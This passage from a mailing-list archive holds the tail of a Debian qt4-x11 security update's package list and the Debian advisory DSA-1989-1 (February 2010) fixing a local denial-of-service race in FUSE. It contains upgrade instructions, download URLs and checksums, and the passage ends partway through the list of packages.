http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 140016 deb24263775b117ef8367bc89d4d68be http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 3497416 0f97f950fb49a399532694aa6ab40b8c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 459192 5ee6a6fbfa1548358ca2ad801e033340 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 144158 80581254defdb7d7b7d3af7069ff14b2 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 72716 7912412d5e675fb673132200d9d9117d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 480786 60e389b50aae477531b50dc2905f20b8 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 1594040 395947773b25b0692d566f9c6e47e0b4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 48414 9056405b51e0f2cad816e071a36776f4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 194714 caad1a28959aa7fea561dc06bef55346 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 55217666 f4f0f246c07a7ae1b44497fc00dbd8e3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 244830 f074a00e007903e3771c66df7f3efcfa http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 30790 c1dec1bf28a20e1bd2a24833d2384bec http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 52576 c783203cfb164e0013fbfded1c1d0052 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 854404 560ba73fc55690189a271215f3ef2c2e http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 422532 b0ffc9c56df7f7f2445eee291c820749 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 11235082 9a80f5e8649a24c8c4da3b4f77f2d924 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 1597838 597ccee014ca55295e45cc97f98cf73c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 1455288 bfd8f94f8a4f65603cf0c3ad7762ab78 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 65100 8d6ca22bb24e9304c2030e99ac38279a s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 852900 ab84bcde1321f0b33c04686edbdd7f1d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 42392 47c06dcbbd608394b79a52ce13befe24 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 4336914 41015bf0edea53f8df86a3f0892b0516 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 186528 f627eabae0217449b946acbadd9d2885 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 245080 5d54afb9b1998f0cbe571c2d4bc63d98 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 4317764 3c3bf66ecd2a332dcee92f90ce8c7e76 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 55245590 565b4ec96fbf02ac81f9e08cf3af205a http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 63496 ac31ab8ec8679251afc06f54d49aa4ee http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 1548988 516a92fd4db89942aa6b8e6a21ce02d0 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 10492564 9fd10fe6fd84eb14d3b23832eab65124 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 192324 f7ab5380c677edcf15ebdd8e4f184a34 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 45234 66f5a114119c904ad46e6e848154ecd2 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 70528 708da134eee0742b14bdc76af09c1627 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 449388 ddfe9418c152ae4a55042d85d69c9c37 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 1417152 806724b858f8c693c582360f544ee5de http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 1475076 3d24017f5b062c615f490301ac27214a http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 14296138 9aeeb16c17f3034e55a0b7a82643417a http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 142528 d836b52cf73b72199562d684a8eeb2ed http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 30558 8277d0f9382a8f7a4867d6a87711ea87 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 414206 91ad7bda75d6664b197485977a8955f2 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 30546 632c492577c5af53fc01161de449dabb http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 2154792 5b8fe3e7e176155dc97e5ffcfe7426fd http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 91685948 b8b0e9db0180b1c47c16bdd5746598ef http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 62314 c47784c1587ea7e4425a33495c9de617 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 2095460 145b66848768e0f8330e2edbc88db858 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 138826 7a8a21a09786137a9c13ab56988488ce http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 42386 64c89d29b0f5d0d84536105c6beff329 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 59058 a6cecbd3d78430f46b0317e2c9e0ea45 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 129886 76b18008de98800aed1777ddaf1d0a86 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 246406 43de5e12b7dcd643850775095b120a1c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 49912 e42ce220d1adfac8630ee0eed70ce2b9 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 3378234 976ddc4073eb8acbbd4bdb2d2fb3cf83 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_s390.deb Size/MD5 checksum: 477090 d2fd78ee5b1d8b1b93830e5b9d10cea4 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 1612394 aeed09e1c797c6f3c78c2db6adddbd66 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 13513910 e11a313d02af5a5b79733f13ad5a9627 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 133442 e42268cd2ac22a6e0af50701d289d81b http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 138466 b789834cb08512d7f2cf779cf00e60e9 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 62244 8d8fc29313a6ecec4863bc1eaf20b0a7 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 86626712 cbe2e0a6baeba262cf0f6134aca47998 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 238238 3fdf41c36cce556577084517cfe63c6d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 245044 919c3190e38c7ba7be27bdc24db75653 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-ibase_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 69856 a06755c7fc2a9974ab129bc02b2d7e5c http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 418010 5a8a929c3d633524085bac704917ab55 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 2098292 d926ce20c96607548bfbef73bba1ac8b http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 180832 32e134535beccec0979de7d105ff7490 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 54687724 1088d3a4524de00036f2c88559c7ec07 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 49476 aa94973518edb2faaad42c2205aa930c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 45524 0fb2f6c5e15d90e2aeaaf96289a6ba17 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 60184 9e22d62c7c2d77a7d75644680ab9811c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 30810 45cf6b13c45cb2811780530b8a60f04a http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 1582588 ff25c993d3d60e229cef37321692a1fd http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 10547182 7243f1579c193aec7c3d472b65383861 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 1376686 edcdf57e4e38b4f3b2937de6b808a0f5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 3692006 a01a7f3e016589c2eba628a72c554064 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 186504 b008a5e95976305e9412c286195501c1 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 69522 29dfe86fa6214e7dedd4caa3e89f6fec http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 451670 cdd73f76458886fd7fc787d4c7145622 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 4302930 65d8e1404fc0d9cfe0fb1f0e94be0900 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 4349116 3867bd57ca4431d98fe4a476c3580990 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 30802 9a791075b2a61d609b00964e08777ad4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 457166 c2ffc3b9e5128626418b082aacff0dcf http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 2110668 e01397334eae0b1520ec76d179f4b10b http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 42510 e72b9f8cc81106c60ea68e600166b903 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 138498 c32afba000ebf7e606381e014ac6a424 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 42218 882c929eb6b8334340f3483c89e17eae http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 57508 590be78cb50ec0134ef9f1bfbc0e3595 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_sparc.deb Size/MD5 checksum: 1053648 28d8a618c3eaf32fb797fa56e00a8f81 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAktoqrUACgkQNxpp46476apXlwCfX4/NGKODvpcR0lKw69TjHNlV 0CQAn37Oz00Rq3T2OwNDVTcTpYzDyCMJ =yUgH -----END PGP SIGNATURE----- From iuculano at debian.org Tue Feb 2 22:57:09 2010 From: iuculano at debian.org (Giuseppe Iuculano) Date: Tue, 2 Feb 2010 23:57:09 +0100 Subject: [Full-disclosure] [SECURITY] [DSA-1989-1] New fuse packages fix denial of service Message-ID: <20100202225709.GB21038@SD6-Casa.iuculano.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1989-1 security at debian.org http://www.debian.org/security/ Giuseppe Iuculano February 02, 2010 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Packages : fuse Vulnerability : denial of service Problem type : local Debian-specific: no CVE Id : CVE-2009-3297 Debian Bug : 567633 Dan Rosenberg discovered a race condition in FUSE, a Filesystem in USErspace. A local attacker, with access to use FUSE, could unmount arbitrary locations, leading to a denial of service. For the oldstable distribution (etch), this problem has been fixed in version 2.5.3-4.4+etch1. For the stable distribution (lenny), this problem has been fixed in version 2.7.4-1.1+lenny1. For the unstable distribution (sid), this problem has been fixed in version 2.8.1-1.2, and will migrate to the testing distribution (squeeze) shortly. We recommend that you upgrade your fuse packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/f/fuse/fuse_2.5.3-4.4+etch1.dsc Size/MD5 checksum: 627 5886da280cc253c8ec2c04f5423238ee http://security.debian.org/pool/updates/main/f/fuse/fuse_2.5.3.orig.tar.gz Size/MD5 checksum: 409443 9c7e8b6606b9f158ae20b8521ba2867c http://security.debian.org/pool/updates/main/f/fuse/fuse_2.5.3-4.4+etch1.diff.gz Size/MD5 checksum: 11785 884b1f0d8646b121d133bb62a42e23c3 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_alpha.deb Size/MD5 checksum: 109494 a46c800a39108d6a148e4db0e1d7d931 http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_alpha.deb Size/MD5 checksum: 54860 4d1acaf1b078a4370c90e47fb4c015e6 http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_alpha.deb Size/MD5 checksum: 59726 414582a9494fd50bed1bc41fdb17bf29 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_amd64.deb Size/MD5 checksum: 98016 fcc2e4f1981cc75fbe341be0012490fc http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_amd64.deb Size/MD5 checksum: 53530 d3857a1f96067112cbe1e7a428178686 http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_amd64.deb Size/MD5 checksum: 58916 5b992f296e4fba939e27fa6bd961ea6d arm architecture (ARM) http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_arm.deb Size/MD5 checksum: 48512 7be71b3c68391c288d7992f2e135449b http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_arm.deb Size/MD5 checksum: 93024 5c703f36949e7f156e4b59245c224eff http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_arm.deb Size/MD5 checksum: 57820 345ad9a6f3ada4facd993823eded7663 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_hppa.deb Size/MD5 checksum: 56194 6a57e0f225759c4c79e5686378834981 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_hppa.deb Size/MD5 checksum: 103676 afb7fd5cb28ea33c8b1b37f53349e7e9 http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_hppa.deb Size/MD5 checksum: 59130 fc3f13580d207f0fe6bf9cfe0034f312 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_i386.deb Size/MD5 checksum: 94356 c692a6cb705c58ff1cea736f51bec18c http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_i386.deb Size/MD5 checksum: 50812 55537e1c0561f86fff06f0a1319098de http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_i386.deb Size/MD5 checksum: 58368 cfd1cee4477d2636b8b522a25310c984 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_ia64.deb Size/MD5 checksum: 63764 0c9b12e7c71d48e2bdc9f3de90c4f3c9 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_ia64.deb Size/MD5 checksum: 115500 8135a9f1b1aead628853749e447784fc http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_ia64.deb Size/MD5 checksum: 65680 f071d857c64ad4c22aa2266fd1089032 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_mipsel.deb Size/MD5 checksum: 58768 4162cfc57ba231f3af6d012d590e8375 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_mipsel.deb Size/MD5 checksum: 103580 095f061de8c350ae2141924b7529ed45 http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_mipsel.deb Size/MD5 checksum: 51218 794ae7a598cdd02a60a410078562aa07 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_powerpc.deb Size/MD5 checksum: 58388 4a586a8d11c5bd2c6a8e6e8e0256e703 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_powerpc.deb Size/MD5 checksum: 98048 d15b93fa2fe7157366dc2eb37f8492a9 http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_powerpc.deb Size/MD5 checksum: 51736 161e6dc0be6a51ab3f3f69be4dc10190 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_s390.deb Size/MD5 checksum: 58848 8c62551e8c465e2ef4e87d34f9277852 http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_s390.deb Size/MD5 checksum: 53938 099298f6cc8b72fecb4d69ba742b9611 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_s390.deb Size/MD5 checksum: 98608 38aab54a2171cec7cf73d5cb9d1d295e sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.5.3-4.4+etch1_sparc.deb Size/MD5 checksum: 58206 be267abf6f16d40838c150374ef1fd4f http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.5.3-4.4+etch1_sparc.deb Size/MD5 checksum: 49212 3300d58324ba45d8e212c0e6b332cc9f http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.5.3-4.4+etch1_sparc.deb Size/MD5 checksum: 94000 16d5f583748d07192d25ea33fa345c05 Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/f/fuse/fuse_2.7.4.orig.tar.gz Size/MD5 checksum: 506658 4879f06570d2225667534c37fea04213 http://security.debian.org/pool/updates/main/f/fuse/fuse_2.7.4-1.1+lenny1.diff.gz Size/MD5 checksum: 16066 f3a61d6fc003f1a2bf3ea9430f2c9a70 http://security.debian.org/pool/updates/main/f/fuse/fuse_2.7.4-1.1+lenny1.dsc Size/MD5 checksum: 1171 889cfc800cd72828730f8bcbd9c777d9 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_alpha.deb Size/MD5 checksum: 20556 585cf2070a4ec688247a41646795131e http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_alpha.deb Size/MD5 checksum: 131872 6955f5703677ceef1b77c75c8b34e629 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_alpha.deb Size/MD5 checksum: 180872 c23ac8be5311ee40fc3f1890b1a3ffb7 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_amd64.deb Size/MD5 checksum: 19042 36f5db5328ff4532c28c14bd956fb8c1 http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_amd64.deb Size/MD5 checksum: 129696 0ab699969dfd5437c91af3cafd9a27b2 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_amd64.deb Size/MD5 checksum: 162514 1d0f908363d1f1d8910b9b029bf1c5df arm architecture (ARM) http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_arm.deb Size/MD5 checksum: 120050 1e1d2c35d13b5b610de23a51d6d6c365 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_arm.deb Size/MD5 checksum: 153696 46442d428f85f1354b1ae6661e65d561 http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_arm.deb Size/MD5 checksum: 17432 a9c572365292b5113af0f3a894215ed4 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_armel.deb Size/MD5 checksum: 17058 33f5fecaf1bac301e0521ec410e8c80e http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_armel.deb Size/MD5 checksum: 154480 c6e475b074e17c79edf3ff5eb7f9040a http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_armel.deb Size/MD5 checksum: 121306 eafcfc5360cc53e3981e1dc9b37e4b89 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_hppa.deb Size/MD5 checksum: 19296 e10df02c43836209f2b5f6584356a92c http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_hppa.deb Size/MD5 checksum: 168740 738e2595ce106f27007e822015d18165 http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_hppa.deb Size/MD5 checksum: 131642 d7b2a7892867d4ec2864f735ab2cf0b2 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_i386.deb Size/MD5 checksum: 124622 443691cc6cff7d375d3e58fc6ef7b6d0 http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_i386.deb Size/MD5 checksum: 155244 1d33eb00f1912b128fa225e4032e6272 http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_i386.deb Size/MD5 checksum: 17894 fc0807ee515177aec7ebf4e90cd28262 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_ia64.deb Size/MD5 checksum: 190582 9abc959eb6696a72b65378cfde3b2d19 http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_ia64.deb Size/MD5 checksum: 24858 7955ac00698ff5d247020e6f71e0b482 http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_ia64.deb Size/MD5 checksum: 151516 2efac5863ec97b2c378b34ac2fae5c8d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_mips.deb Size/MD5 checksum: 18146 1fc317ba48a3258b059fe881d372690a http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_mips.deb Size/MD5 checksum: 169262 a23d47c215a0f7af9ece5a36abeb954e http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_mips.deb Size/MD5 checksum: 124082 a4b3ee554ee279fe3fea8828918d9f21 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_mipsel.deb Size/MD5 checksum: 168578 9dd6e832747412dbc9cd25f80693c3cb http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_mipsel.deb Size/MD5 checksum: 18128 598595bc8251b576c17fcb7e549033be http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_mipsel.deb Size/MD5 checksum: 123686 f0f2d7dd0022ecb02815054d2599cf7e powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_powerpc.deb Size/MD5 checksum: 19598 302d9576bcc31ca2cbd197d4acdc9937 http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_powerpc.deb Size/MD5 checksum: 131390 1edf1966d7d720723e605172c988efc8 